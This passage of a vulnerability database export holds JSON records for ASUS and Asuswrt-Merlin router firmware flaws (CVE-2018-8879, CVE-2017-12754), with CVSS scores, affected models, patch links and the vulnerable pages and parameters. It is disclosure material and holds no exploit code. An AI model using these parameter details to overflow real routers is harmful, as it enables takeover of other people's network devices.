"2017-12-20T00:00:00", "db": "VULHUB", "id": "VHN-101757" }, { "date": "2017-08-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-005983" }, { "date": "2017-09-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201707-768" }, { "date": "2024-11-21T03:07:36.493000", "db": "NVD", "id": "CVE-2017-11344" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201707-768" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware network map global buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005983" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201707-768" } ], "trust": 0.6 } }
var-201911-1650
Vulnerability from variot
Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id. Asuswrt-Merlin The firmware contains a vulnerability related to out-of-bounds writing.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asuswrt-Merlin is a firmware that runs in its router
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1650", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac66u", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.382.50470" }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "asuswrt-merlin", "scope": null, "trust": 0.6, "vendor": "asus", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-02713" }, { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "NVD", "id": "CVE-2018-8879" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-016158" } ] }, "cve": "CVE-2018-8879", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-8879", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2020-02713", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-8879", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2018-8879", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-8879", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-8879", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2020-02713", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201911-1254", "trust": 0.6, "value": "CRITICAL" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-02713" }, { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "CNNVD", "id": "CNNVD-201911-1254" }, { "db": "NVD", "id": "CVE-2018-8879" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id. Asuswrt-Merlin The firmware contains a vulnerability related to out-of-bounds writing.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asuswrt-Merlin is a firmware that runs in its router", "sources": [ { "db": "NVD", "id": "CVE-2018-8879" }, { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "CNVD", "id": "CNVD-2020-02713" } ], "trust": 2.16 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-8879", "trust": 3.0 }, { "db": "JVNDB", "id": "JVNDB-2018-016158", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2020-02713", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201911-1254", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-02713" }, { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "CNNVD", "id": "CNNVD-201911-1254" }, { "db": "NVD", "id": "CVE-2018-8879" } ] }, "id": "VAR-201911-1650", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2020-02713" } ], "trust": 1.1596695499999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-02713" } ] }, "last_update_date": "2024-11-23T22:05:56.126000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "RT-AC66U", "trust": 0.8, "url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS" }, { "title": "Patch for ASUS Asuswrt-Merlin blocking.asp buffer overflow vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/197547" }, { "title": "ASUS Asuswrt-Merlin Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=104042" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-02713" }, { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "CNNVD", "id": "CNNVD-201911-1254" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "NVD", "id": "CVE-2018-8879" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "https://pagedout.institute/download/pagedout_001_beta1.pdf" }, { "trust": 1.6, "url": "https://www.asus.com/networking/rtac66u/helpdesk_bios" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8879" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8879" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-02713" }, { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "CNNVD", "id": "CNNVD-201911-1254" }, { "db": "NVD", "id": "CVE-2018-8879" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2020-02713" }, { "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "db": "CNNVD", "id": "CNNVD-201911-1254" }, { "db": "NVD", "id": "CVE-2018-8879" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-11-21T00:00:00", "db": "CNVD", "id": "CNVD-2020-02713" }, { "date": "2019-12-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "date": "2019-11-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201911-1254" }, { "date": "2019-11-21T16:15:11.720000", "db": "NVD", "id": "CVE-2018-8879" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-18T00:00:00", "db": "CNVD", "id": "CNVD-2020-02713" }, { "date": "2019-12-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-016158" }, { "date": "2020-07-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201911-1254" }, { "date": "2024-11-21T04:14:30.903000", "db": "NVD", "id": "CVE-2018-8879" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201911-1254" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Asuswrt-Merlin Firmware out-of-bounds vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-016158" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201911-1254" } ], "trust": 0.6 } }
var-201708-1179
Vulnerability from variot
Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1179", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-n66u", "scope": null, "trust": 1.2, "vendor": "asus", "version": null }, { "model": "asuswrt-merlin", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "380.67" }, { "model": "asuswrt-merlin", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac5300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1900p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac52u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac51u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac1200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12d1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12+", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "asuswrt-merlin \u003c=380.67 0rt-ac5300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac55u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac56u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac58u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "asuswrt-merlin", "scope": "eq", "trust": 0.6, "vendor": "asuswrt", "version": "380.67_0" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-32450" }, { "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "db": "CNNVD", "id": "CNNVD-201708-443" }, { "db": "NVD", "id": "CVE-2017-12754" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:asuswrt-merlin", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007274" } ] }, "cve": "CVE-2017-12754", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2017-12754", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2017-32450", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2017-12754", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2017-12754", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12754", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12754", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-32450", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201708-443", "trust": 0.6, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-32450" }, { "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "db": "CNNVD", "id": "CNNVD-201708-443" }, { "db": "NVD", "id": "CVE-2017-12754" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products", "sources": [ { "db": "NVD", "id": "CVE-2017-12754" }, { "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "db": "CNVD", "id": "CNVD-2017-32450" } ], "trust": 2.16 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12754", "trust": 3.0 }, { "db": "JVNDB", "id": "JVNDB-2017-007274", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2017-32450", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201708-443", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-32450" }, { "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "db": "CNNVD", "id": "CNNVD-201708-443" }, { "db": "NVD", "id": "CVE-2017-12754" } ] }, "id": "VAR-201708-1179", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2017-32450" } ], "trust": 1.2386813426923076 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-32450" } ] }, "last_update_date": "2024-11-23T22:42:08.217000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://asuswrt.lostrealm.ca/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007274" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "db": "NVD", "id": "CVE-2017-12754" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "https://github.com/coincoin7/wireless-router-vulnerability/blob/master/asus_deleteofflineclientoverflow.txt" }, { "trust": 1.6, "url": "https://asuswrt.lostrealm.ca/changelog" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12754" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12754" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-32450" }, { "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "db": "CNNVD", "id": "CNNVD-201708-443" }, { "db": "NVD", "id": "CVE-2017-12754" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2017-32450" }, { "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "db": "CNNVD", "id": "CNNVD-201708-443" }, { "db": "NVD", "id": "CVE-2017-12754" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-02T00:00:00", "db": "CNVD", "id": "CNVD-2017-32450" }, { "date": "2017-09-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "date": "2017-08-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-443" }, { "date": "2017-08-09T15:29:00.183000", "db": "NVD", "id": "CVE-2017-12754" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-02T00:00:00", "db": "CNVD", "id": "CNVD-2017-32450" }, { "date": "2017-09-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007274" }, { "date": "2020-05-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-443" }, { "date": "2024-11-21T03:10:08.223000", "db": "NVD", "id": "CVE-2017-12754" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-443" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware buffer error vulnerability", "sources": [ { "db": "JVNDB", 